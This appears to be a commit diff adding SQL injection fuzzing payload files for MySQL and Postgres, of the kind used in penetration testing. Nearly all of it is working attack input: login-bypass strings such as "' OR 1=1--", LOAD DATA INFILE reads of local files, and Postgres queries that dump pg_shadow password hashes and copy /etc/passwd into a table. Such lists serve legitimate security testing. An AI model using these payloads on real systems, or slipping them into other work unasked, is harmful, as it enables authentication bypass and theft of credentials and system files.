Quick clean up of locations

Fuzzing/Databases/MySQL-Read-Local-Files.fuzzdb.txt

@@ -0,0 +1,3 @@
+# mysql local file disclosure through sqli
+# fuzz interesting absolute filepath/filename into <filepath>
+create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;

Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt

@@ -0,0 +1,8 @@
+# regex replace as many as you can with your fuzzer for best results:
+# <user-fieldname> <pass-fieldname> <username> 
+# also try to brute force a list of possible usernames, including possile admin acct names
+<username>' OR 1=1--
+'OR '' = '	Allows authentication without a valid username.
+<username>'--
+' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
+'OR 1=1--

Fuzzing/Databases/MySQL.fuzzdb.txt

@@ -0,0 +1,6 @@
+1'1
+1 exec sp_ (or exec xp_)
+1 and 1=1
+1' and 1=(select count(*) from tablenames); --
+1 or 1=1
+1' or '1'='1

Fuzzing/Databases/Postgres-Enumeration.fuzzdb.txt

@@ -0,0 +1,20 @@
+# info disclosure payload fuzzfile for pgsql
+select version();	
+select current_database();
+select current_user;
+select session_user;
+select current_setting('log_connections');
+select current_setting('log_statement');
+select current_setting('port');
+select current_setting('password_encryption');
+select current_setting('krb_server_keyfile');
+select current_setting('virtual_host');
+select current_setting('port');
+select current_setting('config_file');
+select current_setting('hba_file');
+select current_setting('data_directory');
+select * from pg_shadow;
+select * from pg_group;
+create table myfile (input TEXT);
+copy myfile from '/etc/passwd'; 
+select * from myfile;copy myfile to /tmp/test;